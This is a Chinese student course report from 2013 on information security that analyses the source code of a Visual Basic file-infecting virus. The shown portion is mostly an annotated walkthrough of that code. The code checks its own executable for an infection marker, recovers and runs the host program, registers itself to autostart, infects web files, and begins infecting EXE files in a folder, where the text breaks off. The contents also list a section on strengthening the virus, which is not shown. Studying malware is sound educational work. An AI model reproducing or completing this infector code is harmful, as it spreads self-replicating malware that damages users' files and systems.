信息安全原理及应用大作业.docVIP

2013年 《信息安全原理及应用》 课程报告 题目： 病毒源代码分析 学 号 201000403091 姓 名 班 级 计Y103 日 期 2013年5月24日  目录 1、目的………………………………………………………1 2、实现系统和使用语言……………………………………1 3、病毒源分析………………………………………………1 4、病毒功能展示……………………………………………4 5、病毒功能增强建议………………………………………7 6、收获与感受………………………………………………7 7、结束语……………………………………………………7 8、参考文献…………………………………………………7  1、目的 电脑病毒是指编制者在计算机程序中插入的破坏性计算机功能或者毁坏数据以影响计算机使用,并能自我复制的一组计算机指令或者程序代码Private Sub Form_Load() On Error Resume Next 从该语句开始，遇到错误时程序不会中止，也不会出现错误提示，将继续运行。作用范围直至程序结束或语句所在函数等结束。 Form1.Visible = True 定义窗体是否可见 Const offset = 45056 这里的offset是病毒的文件大小 Dim b As String * 6 定义一个定长字符串变量，保存特征符 Dim is_infect As Boolean 定义一个Bool类型，保存文件是否被感染的信息 Dim exefile() As Byte 保存正常文件的数组 Dim worm() As Byte 保存病毒文件的数组 Open App.Path \ App.EXEName .exe For Binary As #1 打开病毒本身，以二进制形式，文件标号为1号 a = LOF(1) - 5 求文件1的字节数，并减5 Seek #1, a 定位到文件1的a字节位置 Get #1, , b 进行对文件1读操作，开始位置为默认值，即从当前光标位置读起 If LCase(b) = infect Then 判断程序已经被感染 is_infect = True Seek #1, offset + 2 找到正常文件的开头 ReDim exefile(1 To LOF(1) - (offset + 2) - 6) 减去病毒体积+2和末尾的6个字符，从位置1开始，假如是默认是从0开始 Get #1, , exefile 得到正常的文件，存入exefile Open App.Path \ App.EXEName ~.exe For Binary As #2 文件名多了一个“~” Put #2, , exefile 将得到正常的文件exefile存入文件2 Close 关闭文件2 Shell App.Path \ App.EXEName ~.exe, vbNormalFocus 启动感染的后的执行程序 Else 程序没有被感染，也就是第一次运行病毒体文件 is_infect = False 程序没有被感染，顺序执行到下面，执行感染操作 End If Close 关闭文件1 If LCase(App.Path + \ + App.EXEName + .exe) LCase(Environ(windir)) Then 不在系统目录+没被感染，也就是第一次运行，执行下面 Call auto_run 病毒的自启动，在注册表内启动已经注册的启动项 Call html_disseminate(C:\EXE\) WEB文件感染，调用子程序和函数 Call list1_exe_add(C:\EXE\) 把所有EXE文件放到List1中 End If 感染list2中的EXE文件 For i = 0 To Form1.List1.ListCount - 1 检测list1中的文件是否已经被感染 Open C:\EXE\ Form1.List1.List(i) For Binary As #1 打开路径下的程序 a = LOF(1) - 5 Seek #1, a 定位 Get #1, , b 进行读操作 If LCase(b) = infect Then List3中的文件，已被感染